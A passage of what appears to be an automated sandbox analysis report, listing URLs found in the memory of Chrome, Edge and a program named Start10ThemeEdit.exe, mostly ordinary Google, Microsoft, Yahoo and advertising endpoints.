Source: chrome.exe, 00000008.00000003.2515112294.000031B8025A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2516570090.000031B8025A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2516610994.000031B802C80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2607385686.000031B802E2C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7246
Source: chrome.exe, 00000008.00000003.2515112294.000031B8025A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2516570090.000031B8025A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2516610994.000031B802C80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2607385686.000031B802E2C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7308
Source: chrome.exe, 00000008.00000003.2515112294.000031B8025A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2516570090.000031B8025A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2516610994.000031B802C80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2607385686.000031B802E2C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7319
Source: chrome.exe, 00000008.00000003.2515112294.000031B8025A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2516570090.000031B8025A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2516610994.000031B802C80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2607385686.000031B802E2C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000C.00000003.2640998723.000057500257C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7320
Source: chrome.exe, 00000008.00000002.2607385686.000031B802E2C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7320i
Source: chrome.exe, 00000008.00000002.2607385686.000031B802E2C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000C.00000003.2640998723.000057500257C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7369
Source: chrome.exe, 00000008.00000002.2607385686.000031B802E2C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7369l
Source: chrome.exe, 00000008.00000003.2515112294.000031B8025A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2516570090.000031B8025A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2516610994.000031B802C80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2607385686.000031B802E2C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7382
Source: chrome.exe, 00000008.00000003.2515112294.000031B8025A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2516570090.000031B8025A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2516610994.000031B802C80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2607385686.000031B802E2C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000C.00000003.2640998723.000057500257C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7489
Source: chrome.exe, 00000008.00000003.2515112294.000031B8025A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2516570090.000031B8025A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2516610994.000031B802C80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2607385686.000031B802E2C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000C.00000003.2640998723.000057500257C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7604
Source: chrome.exe, 00000008.00000003.2515112294.000031B8025A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2516570090.000031B8025A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2516610994.000031B802C80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2607385686.000031B802E2C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000C.00000003.2640998723.000057500257C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7714
Source: chrome.exe, 00000008.00000003.2515112294.000031B8025A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2516570090.000031B8025A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2516610994.000031B802C80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2607385686.000031B802E2C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000C.00000003.2640998723.000057500257C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7847
Source: chrome.exe, 00000008.00000003.2515112294.000031B8025A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2516570090.000031B8025A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2516610994.000031B802C80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2607385686.000031B802E2C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000C.00000003.2640998723.000057500257C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7899
Source: chrome.exe, 00000008.00000003.2539684595.000031B803584000.00000004.00000800.00020000.00000000.sdmp, chromecache_514.10.dr	String found in binary or memory: https://apis.google.com
Source: chrome.exe, 00000008.00000002.2611894674.000031B803CAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2600176784.000031B8022B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.l2ZUC8FxqV8.O/m=gapi_iframes
Source: msedge.exe, 0000000C.00000003.2641444128.000001F00ACE5000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000000C.00000002.2654784939.000001F00ACE5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.com
Source: Start10ThemeEdit.exe, 00000006.00000002.3146557319.000000000454C000.00000004.00000020.00020000.00000000.sdmp, Start10ThemeEdit.exe, 00000006.00000002.3143046149.0000000003D00000.00000004.00000020.00020000.00000000.sdmp, ycjwbi.6.dr	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: Start10ThemeEdit.exe, 00000006.00000002.3146557319.000000000454C000.00000004.00000020.00020000.00000000.sdmp, Start10ThemeEdit.exe, 00000006.00000002.3143046149.0000000003D00000.00000004.00000020.00020000.00000000.sdmp, ycjwbi.6.dr	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: chrome.exe, 00000008.00000002.2610330093.000031B803250000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2602925223.000031B802700000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2604812274.000031B802988000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://calendar.google.com/calendar/u/0/r/eventedit?usp=chrome_actions
Source: chrome.exe, 00000008.00000002.2607106625.000031B802D84000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.ico
Source: Start10ThemeEdit.exe, 00000006.00000002.3143046149.0000000003DEA000.00000004.00000020.00020000.00000000.sdmp, 89zcba.6.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: offscreendocument_main.js.14.dr, service_worker_bin_prod.js.14.dr	String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/mathjax/
Source: chrome.exe, 00000008.00000002.2607169345.000031B802DC4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.ico
Source: chrome.exe, 00000008.00000002.2607169345.000031B802DC4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icofrom_play_api
Source: Start10ThemeEdit.exe, 00000006.00000002.3143046149.0000000003DEA000.00000004.00000020.00020000.00000000.sdmp, Start10ThemeEdit.exe, 00000006.00000002.3144205572.000000000433A000.00000004.00000020.00020000.00000000.sdmp, 89zcba.6.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: chrome.exe, 00000008.00000002.2607106625.000031B802D84000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/search
Source: chrome.exe, 00000008.00000002.2607106625.000031B802D84000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=
Source: chrome.exe, 00000008.00000002.2607106625.000031B802D84000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=searchTerms
Source: Start10ThemeEdit.exe, 00000006.00000002.3143046149.0000000003DEA000.00000004.00000020.00020000.00000000.sdmp, Start10ThemeEdit.exe, 00000006.00000002.3144205572.000000000433A000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2603313878.000031B80278C000.00000004.00000800.00020000.00000000.sdmp, 89zcba.6.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: chrome.exe, 00000008.00000003.2517479463.000031B802E70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2599925287.000031B80223C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000C.00000002.2665236705.000057500237C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore
Source: chrome.exe, 00000008.00000002.2603973087.000031B8028B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore206E5
Source: chrome.exe, 00000008.00000002.2605981979.000031B802B3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2610454142.000031B8032F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2610623437.000031B803348000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2610802097.000031B8034B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2606299171.000031B802BC8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: chrome.exe, 00000008.00000002.2603973087.000031B8028B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstoreC:
Source: chrome.exe, 00000008.00000003.2516897229.000031B802E88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2516645915.000031B802E60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2607564200.000031B802E88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2516681103.000031B802E78000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2522443333.000031B802EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2516788880.000031B802EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2521264930.000031B802E60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2518611328.000031B802EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2517479463.000031B802E70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstoreLDDiscover
Source: chrome.exe, 00000008.00000002.2618194795.000055E000920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymity-pa.googleapis.com/
Source: chrome.exe, 00000008.00000003.2508121731.000055E00071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2508250276.000055E000728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2542622315.000031B803A0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
Source: chrome.exe, 00000008.00000002.2618194795.000055E000920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
Source: chrome.exe, 00000008.00000003.2508121731.000055E00071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2508250276.000055E000728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2542622315.000031B803A0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
Source: chrome.exe, 00000008.00000002.2618194795.000055E000920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/KAnonymityServiceJoinRelayServerhttps://chromekanonym
Source: chrome.exe, 00000008.00000002.2618194795.000055E000920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
Source: chrome.exe, 00000008.00000003.2508121731.000055E00071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2508250276.000055E000728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2542622315.000031B803A0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
Source: chrome.exe, 00000008.00000002.2601478596.000031B80240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
Source: chrome.exe, 00000008.00000002.2601478596.000031B80240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
Source: chrome.exe, 00000008.00000002.2599925287.000031B80223C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000C.00000002.2665236705.000057500237C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromewebstore.google.com/
Source: chrome.exe, 00000008.00000002.2609281781.000031B80308C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromium-i18n.appspot.com/ssl-aggregate-address/
Source: chrome.exe, 00000008.00000002.2601240947.000031B8023D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://classroom.googleapis.com/
Source: chrome.exe, 00000008.00000002.2601240947.000031B8023D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://classroom.googleapis.com/g
Source: chrome.exe, 00000008.00000003.2504409137.00005E54002D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2504467973.00005E54002E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/cr/report
Source: chrome.exe, 00000008.00000002.2604287990.000031B802900000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2605707752.000031B802AE6000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2512833563.000031B802690000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2607169345.000031B802DC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2604039621.000031B8028C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2601240947.000031B8023D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2599925287.000031B80223C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000C.00000002.2662487856.0000575002240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: chrome.exe, 00000008.00000002.2606119400.000031B802B7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=b
Source: chrome.exe, 00000008.00000002.2606119400.000031B802B7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collections?rt=b
Source: chrome.exe, 00000008.00000002.2604812274.000031B802988000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b
Source: chrome.exe, 00000008.00000002.2601240947.000031B8023D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients4.google.com/chrome-sync
Source: chrome.exe, 00000008.00000002.2601240947.000031B8023D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients4.google.com/chrome-sync/event
Source: chrome.exe, 00000008.00000002.2603665345.000031B802838000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
Source: Start10ThemeEdit.exe, 00000006.00000002.3146557319.000000000454C000.00000004.00000020.00020000.00000000.sdmp, Start10ThemeEdit.exe, 00000006.00000002.3143046149.0000000003D00000.00000004.00000020.00020000.00000000.sdmp, ycjwbi.6.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: Start10ThemeEdit.exe, 00000006.00000002.3146557319.000000000454C000.00000004.00000020.00020000.00000000.sdmp, Start10ThemeEdit.exe, 00000006.00000002.3143046149.0000000003D00000.00000004.00000020.00020000.00000000.sdmp, ycjwbi.6.dr	String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: chrome.exe, 00000008.00000002.2606558683.000031B802C58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/report-to/gws/none
Source: is-VDE8M.tmp.3.dr	String found in binary or memory: https://d.symcb.com/cps0%
Source: is-VDE8M.tmp.3.dr	String found in binary or memory: https://d.symcb.com/rpa0
Source: chrome.exe, 00000008.00000002.2601986408.000031B802520000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.goog
Source: chrome.exe, 00000008.00000002.2601986408.000031B802520000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.googl0
Source: chrome.exe, 00000008.00000003.2512833563.000031B802690000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/
Source: chrome.exe, 00000008.00000002.2610454142.000031B8032F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2606256209.000031B802BB4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/
Source: chrome.exe, 00000008.00000002.2603120265.000031B80275C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2610964902.000031B8034F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/:
Source: chrome.exe, 00000008.00000002.2603120265.000031B80275C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2610964902.000031B8034F5000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2610330093.000031B803250000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2604687446.000031B802964000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2607335105.000031B802E14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
Source: chrome.exe, 00000008.00000002.2603120265.000031B80275C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2610964902.000031B8034F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/J
Source: chrome.exe, 00000008.00000003.2542622315.000031B803A0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview2K
Source: chrome.exe, 00000008.00000002.2606256209.000031B802BB4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/dogl
Source: chrome.exe, 00000008.00000002.2603120265.000031B80275C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2601783878.000031B8024D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2608426686.000031B802F5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2610964902.000031B8034F5000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2610330093.000031B803250000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2612052483.000031B803D88000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
Source: chrome.exe, 00000008.00000002.2612052483.000031B803D88000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default(
Source: chrome.exe, 00000008.00000002.2610330093.000031B803250000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_defaultlt
Source: chrome.exe, 00000008.00000002.2610454142.000031B8032F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/njb1
Source: chrome.exe, 00000008.00000002.2602758289.000031B8026CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2604687446.000031B802964000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2604580303.000031B80294C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2607335105.000031B802E14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000008.00000002.2602758289.000031B8026CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2603835221.000031B802890000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2604687446.000031B802964000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2604580303.000031B80294C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000008.00000002.2602758289.000031B8026CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2603835221.000031B802890000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2604687446.000031B802964000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2604580303.000031B80294C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actionsy
Source: chrome.exe, 00000008.00000002.2610454142.000031B8032F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/
Source: chrome.exe, 00000008.00000002.2610454142.000031B8032F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/1
Source: chrome.exe, 00000008.00000002.2603120265.000031B80275C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2610964902.000031B8034F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/:
Source: chrome.exe, 00000008.00000002.2603120265.000031B80275C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2610964902.000031B8034F5000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2610330093.000031B803250000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2604039621.000031B8028C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2607335105.000031B802E14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
Source: chrome.exe, 00000008.00000002.2603120265.000031B80275C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2610964902.000031B8034F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/J
Source: chrome.exe, 00000008.00000002.2610330093.000031B803250000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
Source: chrome.exe, 00000008.00000002.2610762205.000031B80349C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_defaultjb
Source: chrome.exe, 00000008.00000002.2610454142.000031B8032F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/ogl
Source: chrome.exe, 00000008.00000002.2610330093.000031B803250000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2602925223.000031B802700000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2604812274.000031B802988000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000008.00000002.2608304694.000031B802F38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2601240947.000031B8023D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/
Source: chrome.exe, 00000008.00000002.2603120265.000031B80275C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/:
Source: chrome.exe, 00000008.00000002.2603120265.000031B80275C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2604687446.000031B802964000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2607335105.000031B802E14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
Source: chrome.exe, 00000008.00000002.2603120265.000031B80275C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/J
Source: chrome.exe, 00000008.00000002.2610762205.000031B80349C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2603120265.000031B80275C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2608426686.000031B802F5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2610330093.000031B803250000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
Source: chrome.exe, 00000008.00000002.2608426686.000031B802F5C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default1
Source: chrome.exe, 00000008.00000002.2610330093.000031B803250000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_defaultag
Source: chrome.exe, 00000008.00000002.2601240947.000031B8023D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/lfnkbppncabfkddbjimcfncm00
Source: chrome.exe, 00000008.00000002.2608304694.000031B802F38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/oglh
Source: chrome.exe, 00000008.00000002.2610330093.000031B803250000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2602925223.000031B802700000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2604812274.000031B802988000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000008.00000003.2512833563.000031B802690000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-autopush.corp.google.com/
Source: chrome.exe, 00000008.00000003.2512833563.000031B802690000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-0.corp.google.com/
Source: chrome.exe, 00000008.00000003.2512833563.000031B802690000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-1.corp.google.com/
Source: chrome.exe, 00000008.00000002.2601986408.000031B802520000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-2.corp
Source: chrome.exe, 00000008.00000003.2512833563.000031B802690000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-2.corp.google.com/
Source: chrome.exe, 00000008.00000002.2601986408.000031B802520000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-3.corp.googl
Source: chrome.exe, 00000008.00000003.2512833563.000031B802690000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-3.corp.google.com/
Source: chrome.exe, 00000008.00000002.2601986408.000031B802520000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-4.c
Source: chrome.exe, 00000008.00000003.2512833563.000031B802690000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-4.corp.google.com/
Source: chrome.exe, 00000008.00000002.2601986408.000031B802520000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-5.corp.go
Source: chrome.exe, 00000008.00000003.2512833563.000031B802690000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-5.corp.google.com/
Source: chrome.exe, 00000008.00000003.2512833563.000031B802690000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-6.corp.google.com/
